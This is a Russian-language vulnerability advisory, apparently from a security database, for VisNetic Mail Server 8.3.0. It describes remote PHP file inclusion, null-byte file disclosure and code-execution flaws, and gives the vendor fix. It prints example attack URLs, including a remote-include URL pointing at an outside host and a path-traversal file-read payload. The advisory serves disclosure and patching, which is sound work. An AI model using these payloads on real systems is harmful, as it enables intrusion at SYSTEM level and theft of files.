Дата публикации: | 28.12.2005 |
Всего просмотров: | 3098 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2005-3131 CVE-2005-3132 CVE-2005-3133 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Раскрытие важных данных Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | VisNetic Mail Server 8.x |
Уязвимые версии: VisNetic Mail Server 8.3.0 build 1, возможно более ранние версии
Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в переменных "language" и "lang_settings" в сценариях "/accounts/inc/include.php" и "/admin/inc/include.php". Удаленный пользователь может переопределить глобальные переменные и, с помощью специально сформированного URL, выполнить произвольный PHP сценарий на целевой системе. Пример:
http://[host]:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ Удачная эксплуатация уязвимости позволит злоумышленнику выполнить PHP сценарий с привилегиями SYSTEM в конфигурации по умолчанию. 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "lang" сценария "/dir/include.html". Удаленный пользователь может просмотреть произвольные файлы на системе. Пример: http://[host]:32000/dir/include.html?lang=[file]%00 3. Уязвимость существует из-за недостаточной обработки входных данных в параметре "language" в сценарии "/mail/settings.html". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями SYSTEM в конфигурации по умолчанию. Пример:
http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST 4. Уязвимость существует из-за недостаточной инициализации переменных "default_layout" и "layout_settings" при обработке неизвестного HTTP_USER_AGENT. Удаленный пользователь может просмотреть произвольные файлы на системе. Пример:
Example (using non-IE/Mozilla/Firefox browser): URL производителя: www.deerfield.com/products/visnetic-mailserver/ Решение: Установите последнюю версию (8.3.5) с сайта производителя. Источник: |
|
Ссылки: | IceWarp Web Mail Multiple File Inclusion Vulnerabilities |